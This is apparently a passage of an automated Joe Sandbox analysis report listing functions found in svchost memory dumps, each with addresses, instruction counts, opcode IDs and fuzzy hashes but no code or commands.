                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9170f07734df1d98009b00834da16fa691de8b0a93a2e82e959c875bba90f9b0
                                                      • Instruction ID: c3fd8b09664e5b2dd43a0473f912202c451d496e04e5f05fcda412972d9fa684
                                                      • Opcode Fuzzy Hash: 9170f07734df1d98009b00834da16fa691de8b0a93a2e82e959c875bba90f9b0
                                                      • Instruction Fuzzy Hash: DA212B73A0D3969FE302FFBCD8650D97B64EF85214B0901F7D489DB093DD18680A8760
                                                      Function 00007FFB4AD00985 Relevance: .3, Instructions: 346COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80a8b53edc73a3407cda3773578c0c75097f59b9c65a7bc3f33a9a1a9c312f38
                                                      • Instruction ID: d58d6e206516cc0dc3eb2dcaa0043afaa4d805d68b891259b89f75ac0d912e3c
                                                      • Opcode Fuzzy Hash: 80a8b53edc73a3407cda3773578c0c75097f59b9c65a7bc3f33a9a1a9c312f38
                                                      • Instruction Fuzzy Hash: 8AA1247660C62AEEE301BFBCE8455ED3B69EF8532471481B7D549DB087C924648B87F0
                                                      Function 00007FFB4AD009D3 Relevance: .3, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 87a14cec5b243feb9055a0f46545d9045eb1f3deff6743373c7405c60d0a0f2a
                                                      • Instruction ID: 6197975b1b8a3b20844076c5dea474ee2eaf662aebf84eb2ab88f9eae6b8a1e4
                                                      • Opcode Fuzzy Hash: 87a14cec5b243feb9055a0f46545d9045eb1f3deff6743373c7405c60d0a0f2a
                                                      • Instruction Fuzzy Hash: DE9135A6A0C61AEEE301BFBCF4455ED3BA8EF84334B1485B7D549DB087C924648787B0
                                                      Function 00007FFB4AD00A08 Relevance: .3, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 406c45dcbfa0c35998b9973591f23656ae01d9fc12a03e638bbae508dc51923d
                                                      • Instruction ID: abd321e00dd8a553e10824f832f7d583753b4e9f402abaa9bd04167a749b5ab5
                                                      • Opcode Fuzzy Hash: 406c45dcbfa0c35998b9973591f23656ae01d9fc12a03e638bbae508dc51923d
                                                      • Instruction Fuzzy Hash: E88145A660C61AEEE301BFBCE4455ED3BA9EF84324B1485B7D449DB087C9246487C7F0
                                                      Function 00007FFB4AD00A10 Relevance: .3, Instructions: 301COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e5a29046e7b1fc7244ab5bb3c33876c923a496d75d7983f36106891d6cbb591b
                                                      • Instruction ID: dd1e203870afc138e0918bb21af34b49594a6a539d151fd7720000370ac000f1
                                                      • Opcode Fuzzy Hash: e5a29046e7b1fc7244ab5bb3c33876c923a496d75d7983f36106891d6cbb591b
                                                      • Instruction Fuzzy Hash: BB8145A660C61AEEE301BFBCE4455ED3BA9EF84324B1485B7D449DB187C9246887C7F0
                                                      Function 00007FFB4AD00A48 Relevance: .3, Instructions: 270COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e591ff2020c0ca348e0b0fc3411ce6961428dfb7059e34b7b146fd240065d84e
                                                      • Instruction ID: f55de8b5e1362ee8d2d9aabe4739c0eed9dc9c71abb7dfc227238219debd9a6e
                                                      • Opcode Fuzzy Hash: e591ff2020c0ca348e0b0fc3411ce6961428dfb7059e34b7b146fd240065d84e
                                                      • Instruction Fuzzy Hash: 5071667660861AEEE341BFBCE4455ED3BA9EF84324B1481B6D449D7187C9246487C7B0
                                                      Function 00007FFB4AD00638 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8b9368b57b6cfb2225aa9558495d025527be320dc7e3e7aeecde967fc815429
                                                      • Instruction ID: a24a0d8bb42dd40f79e40c9fbf066585a7baf943bbe05d76b67778d6e81f3ad4
                                                      • Opcode Fuzzy Hash: e8b9368b57b6cfb2225aa9558495d025527be320dc7e3e7aeecde967fc815429
                                                      • Instruction Fuzzy Hash: 9931F1A1B1DA4C0FE789FA7CD45A379A6C6EF98315F1401BEE44EC3293DE289C428345
                                                      Function 00007FFB4AD00D21 Relevance: .1, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3cac1322397aa3f843e1da0d28c4a9374ae4e137d8ca94552c7dff3038b1b13d
                                                      • Instruction ID: b767a03c3271ef1dd6329f4b5d01f9aa57498840f2c2fbcd1b9791796f4a2ba4
                                                      • Opcode Fuzzy Hash: 3cac1322397aa3f843e1da0d28c4a9374ae4e137d8ca94552c7dff3038b1b13d
                                                      • Instruction Fuzzy Hash: E631FA91B1CA095FF745BFBC981A3BD76D6EB98310F1402B6E40DD3986DD186D418391
                                                      Function 00007FFB4AD00BD3 Relevance: .1, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 53aa623545b76288e4d70a3658f8b177ebe2bb87a37b3b70eda15246c2887aaa
                                                      • Instruction ID: 720c02c1302faaae4d481a5c71224c63eb709f395fd71274f8c3e32202c9deaa
                                                      • Opcode Fuzzy Hash: 53aa623545b76288e4d70a3658f8b177ebe2bb87a37b3b70eda15246c2887aaa
                                                      • Instruction Fuzzy Hash: A041D2A0A1CA4D9FE745FF78C4556AD7BA2EF88304F6444B5D009E3686CE386845C750
                                                      Function 00007FFB4AD00858 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1351fbee3922f538cb004d08dd8e60a819a9ba720ecd8e513e26e9a632f1b00e
                                                      • Instruction ID: 2b2b6a3fb4b998c16d51e2894a05c5109a758d787b00d226640fbc4832292696
                                                      • Opcode Fuzzy Hash: 1351fbee3922f538cb004d08dd8e60a819a9ba720ecd8e513e26e9a632f1b00e
                                                      • Instruction Fuzzy Hash: 8931A660509A4DAFD381FF3CC0A81A97BB1FF94304B9480E5D449D3B8BCD385841C751
                                                      Function 00007FFB4AD00870 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a36ddf53d31fb9eeb2e0388acc02267c8e053fd56a6b61ca053a3c11233d9ab
                                                      • Instruction ID: 7fec09a622f5b3316587ec2656b901755be2fb1e49b5b5284339c9d5c92b5004
                                                      • Opcode Fuzzy Hash: 9a36ddf53d31fb9eeb2e0388acc02267c8e053fd56a6b61ca053a3c11233d9ab
                                                      • Instruction Fuzzy Hash: 1321A260609A4DAFD391FF3CC0A81AA7BB1FF94304B9484E5D849D3B8ECE385941C751
                                                      Function 00007FFB4AD022C1 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ab131e6367ab26a692368df16756516069c2db3bff3a641dcdea6048cb4ca945
                                                      • Instruction ID: bba4277ecc76d96029e0c9583fb5fcf4631de40b085a751c6d1d399942a293ef
                                                      • Opcode Fuzzy Hash: ab131e6367ab26a692368df16756516069c2db3bff3a641dcdea6048cb4ca945
                                                      • Instruction Fuzzy Hash: 19014954A0EBC94FE786BF3899550367FE0EF91209B1804FBE8C8DB597EC0899858342

                                                      Executed Functions

                                                      Function 00007FFB4AD31719 Relevance: .7, Instructions: 695COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6982dc798adcef41cd2384cd6777455286518a57eca5cfb42efac854620c948d
                                                      • Instruction ID: 268223c3e5d79105d2bb9253331a504b4910da4c70e7dfd990ad898030b86c59
                                                      • Opcode Fuzzy Hash: 6982dc798adcef41cd2384cd6777455286518a57eca5cfb42efac854620c948d
                                                      • Instruction Fuzzy Hash: 0222E6A1B2DA4A9FEB95FF38C4592B977D6EF98300F5405F9E44EC3286DD28AC018741
                                                      Function 00007FFB4AD320F1 Relevance: .2, Instructions: 209COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af340b4d7d9db7c56d62c8a27b9c90bb85cfbaaef7891c53b225f96a43f88ddf
                                                      • Instruction ID: c16575d6b3733645ddffad5edba979650b15bc391ba80cf68de56a0c6ab579a1
                                                      • Opcode Fuzzy Hash: af340b4d7d9db7c56d62c8a27b9c90bb85cfbaaef7891c53b225f96a43f88ddf
                                                      • Instruction Fuzzy Hash: AB510E90B1E6C94FD387BF788865276BFE8DF97219B1801FAE089CA193DD085846C346
                                                      Function 00007FFB4AD30AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9M_^
                                                      • API String ID: 0-1708477388
                                                      • Opcode ID: 9f3b8989ddacf3e8f3dc579f1eb740c16590c61fbe3d1c0bac4dd9c1cb6802dd
                                                      • Instruction ID: 5be8052959548848d19103c4eceffcd153eca0b9ab3247f99a3fcac4b3c49200
                                                      • Opcode Fuzzy Hash: 9f3b8989ddacf3e8f3dc579f1eb740c16590c61fbe3d1c0bac4dd9c1cb6802dd
                                                      • Instruction Fuzzy Hash: AA6129A5B0E61ADAE741BF7CE4051EC77A5EF84324B1482F6D80DD7187CD28684787A0
                                                      Function 00007FFB4AD30E8E Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4M_^
                                                      • API String ID: 0-2545914641
                                                      • Opcode ID: b5abc885c199d08399ae794e2a93efc4e71a4d4825340561b4fe857367c3365c
                                                      • Instruction ID: 6599750f69af7786bd9b0254ba7cc549e06cf3fc407c22c3ce1947caa70c8454
                                                      • Opcode Fuzzy Hash: b5abc885c199d08399ae794e2a93efc4e71a4d4825340561b4fe857367c3365c
                                                      • Instruction Fuzzy Hash: F4510461B0EA864FE397BA78D8551B93FE6DF86220B0941FBD489C7193DC1C9C468362
                                                      Function 00007FFB4AD31295 Relevance: .9, Instructions: 862COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2e46173e638f5e0822a822dc6441b911da9c1966be7b3122be5392858e438ba
                                                      • Instruction ID: a24d8ca7236abd5562068a78a4307374393376e3cd7d46d8d057cea14d559d5d
                                                      • Opcode Fuzzy Hash: c2e46173e638f5e0822a822dc6441b911da9c1966be7b3122be5392858e438ba
                                                      • Instruction Fuzzy Hash: 9921FB67E0E79B8FE741BFBCD8620E97B74EF86220B0842F7D485DA193DD1858068350
                                                      Function 00007FFB4AD30985 Relevance: .3, Instructions: 346COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 984cae828a16c1c812c9c48a1c1e44304bab6f830306d28d2606b8f35a7d1f6d
                                                      • Instruction ID: 031e687452d2457556d686dce8e9ec904d5b883c254a8443b536f867746c9bce
                                                      • Opcode Fuzzy Hash: 984cae828a16c1c812c9c48a1c1e44304bab6f830306d28d2606b8f35a7d1f6d
                                                      • Instruction Fuzzy Hash: 10A15566B0A66ADAD701BF7CE8451EC7BA4EF85335B1482F7C849CA187CD28644787E0
                                                      Function 00007FFB4AD309D3 Relevance: .3, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b423d53dbaa03fcd72eec8dce6b41d54a30a56e72c6832c4548b2e70537b2b54
                                                      • Instruction ID: 28d049c326424adf41f2b126ea28884f2681766e45ffb23f0de1d5a75215d6eb
                                                      • Opcode Fuzzy Hash: b423d53dbaa03fcd72eec8dce6b41d54a30a56e72c6832c4548b2e70537b2b54
                                                      • Instruction Fuzzy Hash: DC912366B0AA2EDAD701BF7CF4051E87BA4EF85335B1482F7C449CA187CD28644787E0
                                                      Function 00007FFB4AD30A08 Relevance: .3, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 211425fc17305469dc886443c17b758fae24b6b5d7a49fb8da76cee508c743db
                                                      • Instruction ID: a8eca53b7bb95c98341f3b529826da0cdc808aaf4a186e2030324b4b7b7e6478
                                                      • Opcode Fuzzy Hash: 211425fc17305469dc886443c17b758fae24b6b5d7a49fb8da76cee508c743db
                                                      • Instruction Fuzzy Hash: F3813566B09A2EDAD701BF7CF4052ED7BA4EF85325B1482F7D849CA187CD28644787E0
                                                      Function 00007FFB4AD30A10 Relevance: .3, Instructions: 301COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6630af5a2c74608da739294435ebcdb44557b3c9ca15239aac51ab917f23aabe
                                                      • Instruction ID: f3a550d18680ee2e51abab7c78915259fb70ac47001dcef319e37ebe924c4c2b
                                                      • Opcode Fuzzy Hash: 6630af5a2c74608da739294435ebcdb44557b3c9ca15239aac51ab917f23aabe
                                                      • Instruction Fuzzy Hash: 1D814466B09A2ADAD701BF7CF4052ED7BA4EF85335B1482F7D849CA187CD28644787E0
                                                      Function 00007FFB4AD30A48 Relevance: .3, Instructions: 270COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 93a26fa7796a2dfb07ba4fa5b9c0e387d79767828710a9e312a2f9918b8bae85
                                                      • Instruction ID: 20f6f4a909cf06bbf5d8a5f8c8e763de414bd40ce582746e4ca7afa58063a172
                                                      • Opcode Fuzzy Hash: 93a26fa7796a2dfb07ba4fa5b9c0e387d79767828710a9e312a2f9918b8bae85
                                                      • Instruction Fuzzy Hash: 5E716666B0AA2EDAD701BF7CE4052EC7BA4EF85325B1482F6D449D7187CD28A447C7E0
                                                      Function 00007FFB4AD30638 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00170f9dc2704fa979f0a0d1e12f551ad457a26e5ef7ccd4c9ddbd0ed82fd195
                                                      • Instruction ID: 31bf115934f8957c9199b8d0c889e758a1b860970a7d1ed4601c399cd8f3e255
                                                      • Opcode Fuzzy Hash: 00170f9dc2704fa979f0a0d1e12f551ad457a26e5ef7ccd4c9ddbd0ed82fd195
                                                      • Instruction Fuzzy Hash: E931D361B1DA480FE789FB3C945A379A6C6EB98315F1402FEE44EC3293DD289C428345
                                                      Function 00007FFB4AD30D21 Relevance: .1, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd90a5e10fb1264608242e6a8cb47c4d492fb05fb9e21d9ec28b19b4dd492103
                                                      • Instruction ID: da63c2760dcf6d934bab0c861511e9abe13f28c5d98e1fed9a16499a9ad077f0
                                                      • Opcode Fuzzy Hash: fd90a5e10fb1264608242e6a8cb47c4d492fb05fb9e21d9ec28b19b4dd492103
                                                      • Instruction Fuzzy Hash: 4231D391B19A099BE745BBBC981A3BD76D6EF98700F1402F6E40DD3582DD28AD018791
                                                      Function 00007FFB4AD30BD3 Relevance: .1, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15e9149fa92c810c6054066aa31aa1f5d6dd6e48840026a64ab45205b7d5a452
                                                      • Instruction ID: 02c258fb179e8375762b4e7f1c98df597ff99d73cf9ff48bb82d409452a4bb29
                                                      • Opcode Fuzzy Hash: 15e9149fa92c810c6054066aa31aa1f5d6dd6e48840026a64ab45205b7d5a452
                                                      • Instruction Fuzzy Hash: 5641B270A1DA4D8FEB85FF78C4652EDBBA2FF98300F6445B5D009D328ACD38A9458750
                                                      Function 00007FFB4AD30858 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a274d77b7cb5051bfcab0f7c986e25a2088fa683dfccd4748fa19676472726c
                                                      • Instruction ID: 382d20db2c23300df048e7ecb3555e5bda1ff2bd028e36a26cbd5d942a985ebf
                                                      • Opcode Fuzzy Hash: 9a274d77b7cb5051bfcab0f7c986e25a2088fa683dfccd4748fa19676472726c
                                                      • Instruction Fuzzy Hash: 1F31A16060AB8DDFD382FF38C4A81E97FA1EF94204BA081E5D849D738BCD3C99418761
                                                      Function 00007FFB4AD30870 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7476d388782daa06014ea2295b9e93900507d099afc6cc1312d5f3c3bfd2d6d0
                                                      • Instruction ID: 74778e87d2bbcdd85c0e4541efbc7ddb565a4a406bb5bc7eb5988e8271eca887
                                                      • Opcode Fuzzy Hash: 7476d388782daa06014ea2295b9e93900507d099afc6cc1312d5f3c3bfd2d6d0
                                                      • Instruction Fuzzy Hash: D3218260609A8D9FD395FB38C4A85E97F71AF94204BA085E5D849C338ECD3C9A518751
                                                      Function 00007FFB4AD322C1 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c09e513bbb3264d1756167805cfcf81d5eb29fb2beda694d76c70f11b2ab4cfd
                                                      • Instruction ID: b0cdbc1ee638c624f314034fc4a8b932b880786e5cb3777ca73b861d91b78a41
                                                      • Opcode Fuzzy Hash: c09e513bbb3264d1756167805cfcf81d5eb29fb2beda694d76c70f11b2ab4cfd
                                                      • Instruction Fuzzy Hash: 51014959E0EBC54FE786BF388D554357FE0DFA1240B1804FAE8C8CA197DC08A9818342